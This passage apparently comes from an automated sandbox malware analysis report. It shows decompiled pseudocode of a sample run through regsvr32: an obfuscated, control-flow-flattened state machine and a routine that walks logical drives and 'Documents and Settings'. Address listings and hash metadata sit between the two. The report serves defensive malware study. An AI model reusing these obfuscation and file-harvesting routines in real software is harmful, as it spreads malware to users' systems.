                                                                                                                				_v400 = _v400 ^ 0x6a5233e1;
                                                                                                                				_v376 = 0x7a699e;
                                                                                                                				_v376 = _v376 | 0xfe6a8076;
                                                                                                                				_v376 = _v376 >> 6;
                                                                                                                				_v376 = _v376 + 0xd251;
                                                                                                                				_v376 = _v376 ^ 0x03ffdfcc;
                                                                                                                				_v112 = 0xc756f2;
                                                                                                                				_t958 = 0xa;
                                                                                                                				_v112 = _v112 / _t958;
                                                                                                                				_v112 = _v112 ^ 0x0013a0e6;
                                                                                                                				_v348 = 0xf39f77;
                                                                                                                				_v348 = _v348 | 0xd8d23809;
                                                                                                                				_t959 = 0x68;
                                                                                                                				_v348 = _v348 / _t959;
                                                                                                                				_t960 = 0x4f;
                                                                                                                				_v348 = _v348 / _t960;
                                                                                                                				_v348 = _v348 ^ 0x0007a29a;
                                                                                                                				_v356 = 0x864313;
                                                                                                                				_v356 = _v356 | 0x526b73fd;
                                                                                                                				_t1076 = 0x23b9606;
                                                                                                                				_t961 = 0x69;
                                                                                                                				_v356 = _v356 / _t961;
                                                                                                                				_v356 = _v356 >> 9;
                                                                                                                				_v356 = _v356 ^ 0x0002ba2b;
                                                                                                                				_v364 = 0x55b1e8;
                                                                                                                				_t962 = 0x5a;
                                                                                                                				_v80 = 0x48;
                                                                                                                				_v364 = _v364 / _t962;
                                                                                                                				_v364 = _v364 ^ 0x05aefe6c;
                                                                                                                				_v364 = _v364 ^ 0xc7e9cdd2;
                                                                                                                				_v364 = _v364 ^ 0xc2468ef2;
                                                                                                                				while(1) {
                                                                                                                					L1:
                                                                                                                					while(1) {
                                                                                                                						L2:
                                                                                                                						_t1053 = 0xb7574b4;
                                                                                                                						while(1) {
                                                                                                                							L3:
                                                                                                                							_t891 = 0x5efe29c;
                                                                                                                							do {
                                                                                                                								while(1) {
                                                                                                                									L4:
                                                                                                                									_t1087 = _t929 - _t891;
                                                                                                                									if(_t1087 <= 0) {
                                                                                                                										break;
                                                                                                                									}
                                                                                                                									__eflags = _t929 - 0x89e8397;
                                                                                                                									if(_t929 == 0x89e8397) {
                                                                                                                										E001B2519(_v348, _v100, _v356, _v140, _v364);
                                                                                                                										_t929 = 0xb88ca79;
                                                                                                                										goto L33;
                                                                                                                									} else {
                                                                                                                										__eflags = _t929 - _t1053;
                                                                                                                										if(_t929 == _t1053) {
                                                                                                                											_t894 = E001AC01C(_v156, _v164, _v372, _v380, _v104);
                                                                                                                											_t1081 = _t1081 + 0xc;
                                                                                                                											__eflags = _t894 - _v148;
                                                                                                                											_t968 = 0xdb00a42;
                                                                                                                											_t929 =  ==  ? 0xdb00a42 : 0x4084ff9;
                                                                                                                											goto L2;
                                                                                                                										} else {
                                                                                                                											__eflags = _t929 - 0xd000b28;
                                                                                                                											if(__eflags == 0) {
                                                                                                                												_t929 = 0x41fbdc1;
                                                                                                                												continue;
                                                                                                                											} else {
                                                                                                                												__eflags = _t929 - _t968;
                                                                                                                												if(__eflags == 0) {
                                                                                                                													_push(_v272);
                                                                                                                													_push(0x1a1544);
                                                                                                                													_push(_v428);
                                                                                                                													_t1078 = E001BF5D9(_v264, _v220, __eflags);
                                                                                                                													_v96 = _v80;
                                                                                                                													_t900 = E001AA838(_v104, _v412,  &_v96,  &_v76, _v196, _t896, _v256, _v264, _v204, _v420, _v80, _v212);
                                                                                                                													_t1081 = _t1081 + 0x34;
                                                                                                                													__eflags = _t900 - _v404;
                                                                                                                													if(_t900 != _v404) {
                                                                                                                														_t929 = 0x4084ff9;
                                                                                                                													} else {
                                                                                                                														_push(_v188);
                                                                                                                														_t902 =  *0x1c4208; // 0x0
                                                                                                                														_push(_t902 + 0x20);
                                                                                                                														_push(_v396);
                                                                                                                														_push( &_v68);
                                                                                                                														_t993 = 0x40;
                                                                                                                														E001BFD42(_t993, _v180);
                                                                                                                														_t1081 = _t1081 + 0x10;
                                                                                                                														_t929 = 0x5aa176b;
                                                                                                                													}
                                                                                                                													E001BF94B(_t1078, _v172, _v388, _v240, _v248);
                                                                                                                													L14:
                                                                                                                													_t1076 = 0x23b9606;
                                                                                                                													L33:
                                                                                                                													_t1081 = _t1081 + 0xc;
                                                                                                                													L34:
                                                                                                                													_t1053 = 0xb7574b4;
                                                                                                                													_t891 = 0x5efe29c;
                                                                                                                												} else {
                                                                                                                													__eflags = _t929 - 0xe6b3197;
                                                                                                                													if(__eflags == 0) {
                                                                                                                														E001BA379(_v436, _v444, _v280, _v92, _v344);
                                                                                                                														_t1081 = _t1081 + 0xc;
                                                                                                                														_t929 = 0x4084ff9;
                                                                                                                														while(1) {
                                                                                                                															L1:
                                                                                                                															L2:
                                                                                                                															_t1053 = 0xb7574b4;
                                                                                                                															L3:
                                                                                                                															_t891 = 0x5efe29c;
                                                                                                                															goto L4;
                                                                                                                														}
                                                                                                                													}
                                                                                                                												}
                                                                                                                											}
                                                                                                                										}
                                                                                                                									}
                                                                                                                									goto L35;
                                                                                                                								}
                                                                                                                								if(_t1087 == 0) {
                                                                                                                									_t908 = E001B970D(_v104, _v92, _v296, _v304, _v312,  &_v88, _v228);
                                                                                                                									_t1081 = _t1081 + 0x14;
                                                                                                                									__eflags = _t908;
                                                                                                                									_t929 =  ==  ? _t1076 : 0xe6b3197;
                                                                                                                									goto L1;
                                                                                                                								} else {
                                                                                                                									if(_t929 == 0x1eb79de) {
                                                                                                                										_v96 = 0x100;
                                                                                                                										_t910 = E001AC98B(_v132, _v160, _v100, _v120, _v320, 0x100,  &_v104);
                                                                                                                										_t1081 = _t1081 + 0x14;
                                                                                                                										__eflags = _t910 - _v232;
                                                                                                                										_t1053 = 0xb7574b4;
                                                                                                                										_t968 = 0xdb00a42;
                                                                                                                										_t929 =  ==  ? 0xb7574b4 : 0x89e8397;
                                                                                                                										goto L3;
                                                                                                                									} else {
                                                                                                                										if(_t929 == _t1076) {
                                                                                                                											_t912 = E001AED0A(_v88);
                                                                                                                											_t929 = 0x2987a46;
                                                                                                                											__eflags = _t912;
                                                                                                                											_t1080 =  !=  ? 1 : _t1080;
                                                                                                                											while(1) {
                                                                                                                												L1:
                                                                                                                												goto L2;
                                                                                                                											}
                                                                                                                										} else {
                                                                                                                											if(_t929 == 0x2987a46) {
                                                                                                                												E001B64CF(_v448, _v328, _v336, _v88);
                                                                                                                												_t929 = 0xe6b3197;
                                                                                                                												while(1) {
                                                                                                                													L1:
                                                                                                                													goto L2;
                                                                                                                												}
                                                                                                                											} else {
                                                                                                                												if(_t929 == 0x4084ff9) {
                                                                                                                													E001BA379(_v168, _v400, _v376, _v104, _v112);
                                                                                                                													_t1081 = _t1081 + 0xc;
                                                                                                                													_t929 = 0x89e8397;
                                                                                                                													while(1) {
                                                                                                                														L1:
                                                                                                                														goto L2;
                                                                                                                													}
                                                                                                                												} else {
                                                                                                                													if(_t929 == 0x41fbdc1) {
                                                                                                                														_push(_v208);
                                                                                                                														_push(0x1a1634);
                                                                                                                														_push(_v384);
                                                                                                                														_t915 = E001BF5D9(_v316, _v260, __eflags);
                                                                                                                														_push(_v236);
                                                                                                                														_push(0x1a1504);
                                                                                                                														_push(_v276);
                                                                                                                														__eflags = E001AD2C9(_t915, _v408, _v300, _v352,  &_v100, _v244, _v200, E001BF5D9(_v308, _v416, __eflags)) - _v136;
                                                                                                                														_t929 =  ==  ? 0x1eb79de : 0xb88ca79;
                                                                                                                														E001BF94B(_t915, _v268, _v184, _v108, _v192);
                                                                                                                														_t1081 = _t1081 + 0x3c;
                                                                                                                														E001BF94B(_t916, _v340, _v176, _v128, _v292);
                                                                                                                														_t1073 = _v84;
                                                                                                                														goto L14;
                                                                                                                													} else {
                                                                                                                														_t1093 = _t929 - 0x5aa176b;
                                                                                                                														if(_t929 == 0x5aa176b) {
                                                                                                                															_push(_v288);
                                                                                                                															_push(0x1a1544);
                                                                                                                															_t706 =  &_v252; // 0xe2ea5bea
                                                                                                                															_push( *_t706);
                                                                                                                															E001A866C(_v424,  *((intOrPtr*)(_t1073 + 4)), _v124, _v368,  &_v92, _v224, _v100, _v432,  *_t1073, _v392, _v440, _v152, _v360, E001BF5D9(_v360, _v116, _t1093));
                                                                                                                															_t929 =  ==  ? 0x5efe29c : 0x4084ff9;
                                                                                                                															E001BF94B(_t923, _v324, _v144, _v284, _v332);
                                                                                                                															_t1081 = _t1081 + 0x48;
                                                                                                                															_t1076 = 0x23b9606;
                                                                                                                															goto L34;
                                                                                                                														}
                                                                                                                													}
                                                                                                                												}
                                                                                                                											}
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                								L35:
                                                                                                                							} while (_t929 != 0xb88ca79);
                                                                                                                							return _t1080;
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                			}

                                                                                                                0x001b0e9e
                                                                                                                0x001b0ead
                                                                                                                0x001b0eb0
                                                                                                                0x001b0eb4
                                                                                                                0x001b0eb9
                                                                                                                0x001b0ec1
                                                                                                                0x001b0ec9
                                                                                                                0x001b0ed1
                                                                                                                0x001b0ed6
                                                                                                                0x001b0edb
                                                                                                                0x001b0ee3
                                                                                                                0x001b0eee
                                                                                                                0x001b0ef9
                                                                                                                0x001b0f04
                                                                                                                0x001b0f17
                                                                                                                0x001b0f1e
                                                                                                                0x001b0f26
                                                                                                                0x001b0f31
                                                                                                                0x001b0f3c
                                                                                                                0x001b0f47
                                                                                                                0x001b0f52
                                                                                                                0x001b0f68
                                                                                                                0x001b0f6f
                                                                                                                0x001b0f7a
                                                                                                                0x001b0f85
                                                                                                                0x001b0f90
                                                                                                                0x001b0f9b
                                                                                                                0x001b0fa6
                                                                                                                0x001b0fb1
                                                                                                                0x001b0fbc
                                                                                                                0x001b0fc4
                                                                                                                0x001b0fcc
                                                                                                                0x001b0fd7
                                                                                                                0x001b0fe2
                                                                                                                0x001b0ff4
                                                                                                                0x001b0ff9
                                                                                                                0x001b1002
                                                                                                                0x001b100d
                                                                                                                0x001b101f
                                                                                                                0x001b1024
                                                                                                                0x001b102d
                                                                                                                0x001b1038
                                                                                                                0x001b1040
                                                                                                                0x001b1045
                                                                                                                0x001b1051
                                                                                                                0x001b1056
                                                                                                                0x001b105c
                                                                                                                0x001b1064
                                                                                                                0x001b1076
                                                                                                                0x001b1079
                                                                                                                0x001b1080
                                                                                                                0x001b108b
                                                                                                                0x001b1096
                                                                                                                0x001b10a1
                                                                                                                0x001b10a9
                                                                                                                0x001b10b4
                                                                                                                0x001b10c1
                                                                                                                0x001b10c9
                                                                                                                0x001b10d1
                                                                                                                0x001b10df
                                                                                                                0x001b10e4
                                                                                                                0x001b10ea
                                                                                                                0x001b10f2
                                                                                                                0x001b10fe
                                                                                                                0x001b1103
                                                                                                                0x001b1109
                                                                                                                0x001b1112
                                                                                                                0x001b1117
                                                                                                                0x001b111d
                                                                                                                0x001b1125
                                                                                                                0x001b1137
                                                                                                                0x001b113c
                                                                                                                0x001b1145
                                                                                                                0x001b1150
                                                                                                                0x001b115b
                                                                                                                0x001b1166
                                                                                                                0x001b1179
                                                                                                                0x001b117c
                                                                                                                0x001b1183
                                                                                                                0x001b118e
                                                                                                                0x001b11a4
                                                                                                                0x001b11ab
                                                                                                                0x001b11b6
                                                                                                                0x001b11be
                                                                                                                0x001b11c6
                                                                                                                0x001b11ce
                                                                                                                0x001b11d6
                                                                                                                0x001b11de
                                                                                                                0x001b11e6
                                                                                                                0x001b11ee
                                                                                                                0x001b11f3
                                                                                                                0x001b11fb
                                                                                                                0x001b1203
                                                                                                                0x001b1215
                                                                                                                0x001b121a
                                                                                                                0x001b1223
                                                                                                                0x001b122e
                                                                                                                0x001b1236
                                                                                                                0x001b1242
                                                                                                                0x001b1247
                                                                                                                0x001b1251
                                                                                                                0x001b1254
                                                                                                                0x001b1258
                                                                                                                0x001b1260
                                                                                                                0x001b126a
                                                                                                                0x001b1272
                                                                                                                0x001b127d
                                                                                                                0x001b1282
                                                                                                                0x001b1288
                                                                                                                0x001b128d
                                                                                                                0x001b1295
                                                                                                                0x001b12a1
                                                                                                                0x001b12a4
                                                                                                                0x001b12af
                                                                                                                0x001b12b3
                                                                                                                0x001b12bb
                                                                                                                0x001b12c3
                                                                                                                0x001b12cb
                                                                                                                0x001b12cb
                                                                                                                0x001b12d0
                                                                                                                0x001b12d0
                                                                                                                0x001b12d0
                                                                                                                0x001b12d5
                                                                                                                0x001b12d5
                                                                                                                0x001b12d5
                                                                                                                0x001b12da
                                                                                                                0x001b12da
                                                                                                                0x001b12da
                                                                                                                0x001b12da
                                                                                                                0x001b12dc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001b15f7
                                                                                                                0x001b15fd
                                                                                                                0x001b179d
                                                                                                                0x001b17a2
                                                                                                                0x00000000
                                                                                                                0x001b1603
                                                                                                                0x001b1603
                                                                                                                0x001b1605
                                                                                                                0x001b175b
                                                                                                                0x001b1762
                                                                                                                0x001b1771
                                                                                                                0x001b1773
                                                                                                                0x001b1778
                                                                                                                0x00000000
                                                                                                                0x001b160b
                                                                                                                0x001b160b
                                                                                                                0x001b1611
                                                                                                                0x001b1734
                                                                                                                0x00000000
                                                                                                                0x001b1617
                                                                                                                0x001b1617
                                                                                                                0x001b1619
                                                                                                                0x001b1653
                                                                                                                0x001b165a
                                                                                                                0x001b165f
                                                                                                                0x001b1679
                                                                                                                0x001b1682
                                                                                                                0x001b16c7
                                                                                                                0x001b16cc
                                                                                                                0x001b16cf
                                                                                                                0x001b16d3
                                                                                                                0x001b170a
                                                                                                                0x001b16d5
                                                                                                                0x001b16d5
                                                                                                                0x001b16dc
                                                                                                                0x001b16e4
                                                                                                                0x001b16e5
                                                                                                                0x001b16f7
                                                                                                                0x001b16fa
                                                                                                                0x001b16fb
                                                                                                                0x001b1700
                                                                                                                0x001b1703
                                                                                                                0x001b1703
                                                                                                                0x001b172a
                                                                                                                0x001b14cb
                                                                                                                0x001b14cb
                                                                                                                0x001b17a7
                                                                                                                0x001b17a7
                                                                                                                0x001b17aa
                                                                                                                0x001b17aa
                                                                                                                0x001b17b4
                                                                                                                0x001b161b
                                                                                                                0x001b161b
                                                                                                                0x001b1621
                                                                                                                0x001b1641
                                                                                                                0x001b1646
                                                                                                                0x001b1649
                                                                                                                0x001b12cb
                                                                                                                0x001b12cb
                                                                                                                0x001b12d0
                                                                                                                0x001b12d0
                                                                                                                0x001b12d5
                                                                                                                0x001b12d5
                                                                                                                0x00000000
                                                                                                                0x001b12d5
                                                                                                                0x001b12cb
                                                                                                                0x001b1621
                                                                                                                0x001b1619
                                                                                                                0x001b1611
                                                                                                                0x001b1605
                                                                                                                0x00000000
                                                                                                                0x001b15fd
                                                                                                                0x001b12e2
                                                                                                                0x001b15e0
                                                                                                                0x001b15e5
                                                                                                                0x001b15ed
                                                                                                                0x001b15ef
                                                                                                                0x00000000
                                                                                                                0x001b12e8
                                                                                                                0x001b12ee
                                                                                                                0x001b1561
                                                                                                                0x001b1584
                                                                                                                0x001b158b
                                                                                                                0x001b159a
                                                                                                                0x001b159c
                                                                                                                0x001b15a1
                                                                                                                0x001b15a6
                                                                                                                0x00000000
                                                                                                                0x001b12f4
                                                                                                                0x001b12f6
                                                                                                                0x001b1535
                                                                                                                0x001b153c
                                                                                                                0x001b1542
                                                                                                                0x001b1544
                                                                                                                0x001b12cb

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: oe$",Dt$#*$+S$1{j$6 S$6S'$7ve$=f$?aR$H$Ni$X&2$Z$\+$b3h$gG$i;H$mQ%k$n$q=6$x]$yC}$3Rj
                                                                                                                • API String ID: 0-3556981824
                                                                                                                • Opcode ID: c8c8677c8d98556b5f43d708474cdaf9a61240f7b6de3596048cfbfd34c9ddfe
                                                                                                                • Instruction ID: ad7470615160b47a11872b3e0ca17520b02d373bbfa718cff12b6fc07b92d920
                                                                                                                • Opcode Fuzzy Hash: c8c8677c8d98556b5f43d708474cdaf9a61240f7b6de3596048cfbfd34c9ddfe
                                                                                                                • Instruction Fuzzy Hash: 2E92E171508380DBD379CF65C98AB9FBBE2FBC5304F10891DE68986260DBB19959CF42
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 87%
                                                                                                                			E1000F3A0() {
                                                                                                                				signed int __ebx;
                                                                                                                				long __edi;
                                                                                                                				CHAR* __esi;
                                                                                                                				signed int _t219;
                                                                                                                				signed int _t221;
                                                                                                                				signed int _t224;
                                                                                                                				CHAR* _t230;
                                                                                                                				intOrPtr _t242;
                                                                                                                				CHAR** _t246;
                                                                                                                				CHAR** _t247;
                                                                                                                				CHAR** _t248;
                                                                                                                				CHAR** _t249;
                                                                                                                				CHAR** _t250;
                                                                                                                				CHAR* _t280;
                                                                                                                				long _t281;
                                                                                                                				CHAR* _t282;
                                                                                                                				signed int _t283;
                                                                                                                				CHAR* _t286;
                                                                                                                				signed int _t287;
                                                                                                                				signed int _t289;
                                                                                                                				intOrPtr _t290;
                                                                                                                				signed int _t291;
                                                                                                                				void* _t299;
                                                                                                                				signed int _t302;
                                                                                                                				CHAR* _t304;
                                                                                                                				intOrPtr* _t305;
                                                                                                                				CHAR* _t309;
                                                                                                                				signed int** _t313;
                                                                                                                				signed int** _t315;
                                                                                                                				void* _t316;
                                                                                                                				CHAR* _t322;
                                                                                                                				CHAR* _t324;
                                                                                                                				CHAR* _t326;
                                                                                                                				CHAR* _t328;
                                                                                                                				signed int _t329;
                                                                                                                				void* _t330;
                                                                                                                				CHAR* _t332;
                                                                                                                				CHAR* _t333;
                                                                                                                				CHAR* _t334;
                                                                                                                				CHAR* _t336;
                                                                                                                				CHAR* _t338;
                                                                                                                				CHAR* _t340;
                                                                                                                				CHAR* _t342;
                                                                                                                				CHAR* _t344;
                                                                                                                				intOrPtr _t355;
                                                                                                                				signed int _t365;
                                                                                                                				CHAR* _t367;
                                                                                                                				CHAR* _t370;
                                                                                                                				char* _t371;
                                                                                                                				CHAR* _t373;
                                                                                                                				CHAR* _t378;
                                                                                                                				signed int _t379;
                                                                                                                				CHAR* _t391;
                                                                                                                				char* _t398;
                                                                                                                				signed int _t402;
                                                                                                                				signed int _t404;
                                                                                                                				void* _t409;
                                                                                                                				long _t410;
                                                                                                                				signed int _t412;
                                                                                                                				void* _t414;
                                                                                                                				signed int* _t415;
                                                                                                                				void* _t417;
                                                                                                                				signed int _t418;
                                                                                                                				void* _t420;
                                                                                                                				signed int _t423;
                                                                                                                				intOrPtr* _t430;
                                                                                                                
                                                                                                                				_push(0xffffffff);
                                                                                                                				_push(E10051F58);
                                                                                                                				_push( *[fs:0x0]);
                                                                                                                				_t418 = _t417 - 0xd8;
                                                                                                                				_t219 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                				 *(_t418 + 0xd4) = _t219 ^ _t418;
                                                                                                                				_push(_t329);
                                                                                                                				_push(_t415);
                                                                                                                				_push(_t413);
                                                                                                                				_push(_t407);
                                                                                                                				_t221 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                				_push(_t221 ^ _t418);
                                                                                                                				 *[fs:0x0] = _t418 + 0xec;
                                                                                                                				_t331 =  *0x1006f050; // 0x0
                                                                                                                				_t421 =  *((intOrPtr*)(_t331 + 0x264));
                                                                                                                				if( *((intOrPtr*)(_t331 + 0x264)) != 0) {
                                                                                                                					L15:
                                                                                                                					_t224 =  *(_t418 + 0xfc);
                                                                                                                					_t436 = _t224 - 6;
                                                                                                                					if(_t224 > 6) {
                                                                                                                						E1002181C(_t329, _t407, _t413, __eflags, "Error in Fun_mycomputer", 0, 0);
                                                                                                                						goto L82;
                                                                                                                					} else {
                                                                                                                						switch( *((intOrPtr*)(_t224 * 4 +  &M1000FE28))) {
                                                                                                                							case 0:
                                                                                                                								goto L19;
                                                                                                                							case 1:
                                                                                                                								_push(__ecx);
                                                                                                                								__ecx = __esp;
                                                                                                                								 *(__esp + 0x18) = __esp;
                                                                                                                								_push("C:\\Documents and Settings");
                                                                                                                								goto L30;
                                                                                                                							case 2:
                                                                                                                								__ebx = GetLogicalDriveStringsA;
                                                                                                                								__edi = GetLogicalDriveStringsA(0, 0);
                                                                                                                								_t69 = __edi + 1; // 0x1
                                                                                                                								__ecx = _t69;
                                                                                                                								__esi = E100160EC(__eflags, _t69);
                                                                                                                								__eax = GetLogicalDriveStringsA(__edi, __esi);
                                                                                                                								__edi = __edi + 0xffffffff;
                                                                                                                								__eflags = __eax - __edi;
                                                                                                                								if(__eflags != 0) {
                                                                                                                									goto L20;
                                                                                                                								} else {
                                                                                                                									__eax = __esi;
                                                                                                                									_t70 = __eax + 1; // 0x1
                                                                                                                									__edx = _t70;
                                                                                                                									do {
                                                                                                                										__cl =  *__eax;
                                                                                                                										__eax = __eax + 1;
                                                                                                                										__eflags = __cl;
                                                                                                                									} while (__cl != 0);
                                                                                                                									__eax = __eax - __edx;
                                                                                                                									__eflags = __eax;
                                                                                                                									__edi = __eax;
                                                                                                                									if(__eflags != 0) {
                                                                                                                										__ebx = GetDriveTypeA;
                                                                                                                										do {
                                                                                                                											__eax = GetDriveTypeA(__esi);
                                                                                                                											__eflags = __eax - 3;
                                                                                                                											if(__eax == 3) {
                                                                                                                												__ecx = __esp;
                                                                                                                												 *(__esp + 0x18) = __esp;
                                                                                                                												__eax = E10005030(__edx, __ebp, __esi);
                                                                                                                												__ecx =  *0x1006f050; // 0x0
                                                                                                                												__eax = E1000EC00(__ecx, __edx, __eflags, __ecx);
                                                                                                                											}
                                                                                                                											__esi =  &(__esi[__edi + 1]);
                                                                                                                											__eax = __esi;
                                                                                                                											__edx = __eax + 1;
                                                                                                                											do {
                                                                                                                												__cl =  *__eax;
                                                                                                                												__eax = __eax + 1;
                                                                                                                												__eflags = __cl;
                                                                                                                											} while (__cl != 0);
                                                                                                                											__eax = __eax - __edx;
                                                                                                                											__eflags = __eax;
                                                                                                                											__edi = __eax;
                                                                                                                										} while (__eflags != 0);
                                                                                                                									}
                                                                                                                									goto L82;
                                                                                                                								}
                                                                                                                								goto L107;
                                                                                                                							case 3:
                                                                                                                								__ecx =  *0x1006f050;
                                                                                                                								__eax = E1000CD90(__eflags);
                                                                                                                								 *(__esp + 0x1c) = __eax;
                                                                                                                								__eax =  *(__eax + 8);
                                                                                                                								__ebx = 0;
                                                                                                                								__eflags = __eax;
                                                                                                                								 *(__esp + 0x14) = __eax;
                                                                                                                								if(__eflags <= 0) {
                                                                                                                									goto L82;
                                                                                                                								} else {
                                                                                                                									while(1) {
                                                                                                                										__eax = E100173A6();
                                                                                                                										__ecx = 0;
                                                                                                                										__eflags = __eax;
                                                                                                                										__ecx = 0 | __eax != 0x00000000;
                                                                                                                										__eflags = __ecx;
                                                                                                                										if(__ecx == 0) {
                                                                                                                											goto L17;
                                                                                                                										}
                                                                                                                										__edx =  *__eax;
                                                                                                                										__ecx = __eax;
                                                                                                                										 *((intOrPtr*)(__edx + 0xc)) =  *((intOrPtr*)( *((intOrPtr*)(__edx + 0xc))))();
                                                                                                                										__eax =  *((intOrPtr*)(__edx + 0xc)) + 0x10;
                                                                                                                										 *(__esp + 0x24) =  *((intOrPtr*)(__edx + 0xc)) + 0x10;
                                                                                                                										__eflags = __ebx;
                                                                                                                										 *(__esp + 0xf4) = 3;
                                                                                                                										if(__eflags < 0) {
                                                                                                                											goto L18;
                                                                                                                										} else {
                                                                                                                											__ecx =  *(__esp + 0x1c);
                                                                                                                											__eflags = __ebx - __ecx[8];
                                                                                                                											if(__eflags >= 0) {
                                                                                                                												goto L18;
                                                                                                                											} else {
                                                                                                                												__edx = __ecx;
                                                                                                                												__ecx[4] = __ecx[4] + __ebx * 4;
                                                                                                                												_push(__ecx[4] + __ebx * 4);
                                                                                                                												__ecx = __esp + 0x28;
                                                                                                                												__eax = E10001FF0(__esp + 0x28);
                                                                                                                												__ecx =  *0x1006f050; // 0x0
                                                                                                                												__esi =  *(__esp + 0x24);
                                                                                                                												__ecx =  &(__ecx[0x4fc]);
                                                                                                                												__eax = E1001D2C4(__ecx, __esi);
                                                                                                                												_push(__ecx);
                                                                                                                												__ebp = __esi - 0x10;
                                                                                                                												 *(__esp + 0x24) = __esp;
                                                                                                                												__edi = __esp;
                                                                                                                												__eax = E10001080(__ebx, __ebp);
                                                                                                                												__esp = __esp + 4;
                                                                                                                												__eax = __eax + 0x10;
                                                                                                                												__ecx = __esp + 0x1c;
                                                                                                                												 *__edi = __eax;
                                                                                                                												__ecx =  *0x1006f050; // 0x0
                                                                                                                												__eax = E1000E6F0(__ecx, __edx, __eflags, __esp + 0x1c);
                                                                                                                												__edx =  *(__esp + 0x18);
                                                                                                                												 *((char*)(__esp + 0xfc)) = 4;
                                                                                                                												__eax = E1003BD06(__edx, 0x10056948);
                                                                                                                												__eflags = __eax;
                                                                                                                												__eax = __eax & 0xffffff00 | __eax != 0x00000000;
                                                                                                                												__eflags = __al;
                                                                                                                												if(__al != 0) {
                                                                                                                													__eax =  *0x1006f050; // 0x0
                                                                                                                													__edx =  *(__eax + 0x10ec);
                                                                                                                													_t98 = __eax + 0x358; // 0x358
                                                                                                                													__ecx = _t98;
                                                                                                                													__eax = E10026562(_t98, 1,  *(__eax + 0x10ec), 0x10056948, 0, 0, 0, 0);
                                                                                                                													__eax =  *0x1006f050; // 0x0
                                                                                                                													__ecx =  *(__eax + 0x10ec);
                                                                                                                													_t100 = __eax + 0x358; // 0x358
                                                                                                                													__ecx = _t100;
                                                                                                                													__eax = E1002637C(_t100,  *(__eax + 0x10ec), 0, __esi);
                                                                                                                													__edx =  *(__esp + 0x18);
                                                                                                                													__eax =  *0x1006f050; // 0x0
                                                                                                                													__ecx =  *(__eax + 0x10ec);
                                                                                                                													_t103 = __eax + 0x358; // 0x358
                                                                                                                													__ecx = _t103;
                                                                                                                													__eax = E1002637C(_t103,  *(__eax + 0x10ec), 1, __edx);
                                                                                                                													__eax =  *0x1006f050; // 0x0
                                                                                                                													_t104 = __eax + 0x10ec;
                                                                                                                													 *_t104 =  *(__eax + 0x10ec) + 1;
                                                                                                                													__eflags =  *_t104;
                                                                                                                												}
                                                                                                                												__eax =  *0x1006f050; // 0x0
                                                                                                                												 *(__eax + 0x10e8) =  *(__eax + 0x10e8) + 1;
                                                                                                                												__eax = E100173A6();
                                                                                                                												__ecx = 0;
                                                                                                                												__eflags = __eax;
                                                                                                                												__ecx = 0 | __eax != 0x00000000;
                                                                                                                												__eflags = __ecx;
                                                                                                                												if(__ecx == 0) {
                                                                                                                													goto L17;
                                                                                                                												} else {
                                                                                                                													__edx =  *__eax;
                                                                                                                													__ecx = __eax;
                                                                                                                													 *((intOrPtr*)(__edx + 0xc)) =  *((intOrPtr*)( *((intOrPtr*)(__edx + 0xc))))();
                                                                                                                													__eax =  *((intOrPtr*)(__edx + 0xc)) + 0x10;
                                                                                                                													 *(__esp + 0x20) =  *((intOrPtr*)(__edx + 0xc)) + 0x10;
                                                                                                                													__eax =  *0x1006f050; // 0x0
                                                                                                                													__ecx =  *(__eax + 0x10f0);
                                                                                                                													__edx =  *(__eax + 0x10ec);
                                                                                                                													__eax =  *(__eax + 0x10e8);
                                                                                                                													_push(__ecx);
                                                                                                                													_push(__edx);
                                                                                                                													__ecx = __esp + 0x2c;
                                                                                                                													 *((char*)(__esp + 0x108)) = 5;
                                                                                                                													__eax = E10003500(__esp + 0x2c, 0x1005873c, __eax);
                                                                                                                													__ecx =  *0x1006f050; // 0x0
                                                                                                                													__esi =  *(__esp + 0x34);
                                                                                                                													__ecx =  &(__ecx[0x304]);
                                                                                                                													__eax = E1001D2C4(__ecx, __esi);
                                                                                                                													__eax = __esi - 0x10;
                                                                                                                													 *(__esp + 0xf4) = 4;
                                                                                                                													__edx = __eax + 0xc;
                                                                                                                													__ecx = __ecx | 0xffffffff;
                                                                                                                													asm("lock xadd [edx], ecx");
                                                                                                                													__ecx = __ecx - 1;
                                                                                                                													__eflags = __ecx;
                                                                                                                													if(__ecx <= 0) {
                                                                                                                														__ecx =  *__eax;
                                                                                                                														__edx =  *( *__eax);
                                                                                                                														_push(__eax);
                                                                                                                														 *((intOrPtr*)(__edx + 4)) =  *((intOrPtr*)( *((intOrPtr*)(__edx + 4))))();
                                                                                                                													}
                                                                                                                													__eax =  *(__esp + 0x18);
                                                                                                                													__eax =  *(__esp + 0x18) + 0xfffffff0;
                                                                                                                													 *(__esp + 0xf4) = 3;
                                                                                                                													__ecx = __eax + 0xc;
                                                                                                                													__edx = __edx | 0xffffffff;
                                                                                                                													asm("lock xadd [ecx], edx");
                                                                                                                													__edx = __edx - 1;
                                                                                                                													__eflags = __edx;
                                                                                                                													if(__edx <= 0) {
                                                                                                                														__ecx =  *__eax;
                                                                                                                														__edx =  *( *__eax);
                                                                                                                														_push(__eax);
                                                                                                                														 *((intOrPtr*)(__edx + 4)) =  *((intOrPtr*)( *((intOrPtr*)(__edx + 4))))();
                                                                                                                													}
                                                                                                                													 *(__esp + 0xf4) = 0xffffffff;
                                                                                                                													__ecx =  &(__ebp[3]);
                                                                                                                													__edx = __edx | 0xffffffff;
                                                                                                                													asm("lock xadd [ecx], edx");
                                                                                                                													__edx = __edx - 1;
                                                                                                                													__eflags = __edx;
                                                                                                                													if(__edx <= 0) {
                                                                                                                														__ecx =  *__ebp;
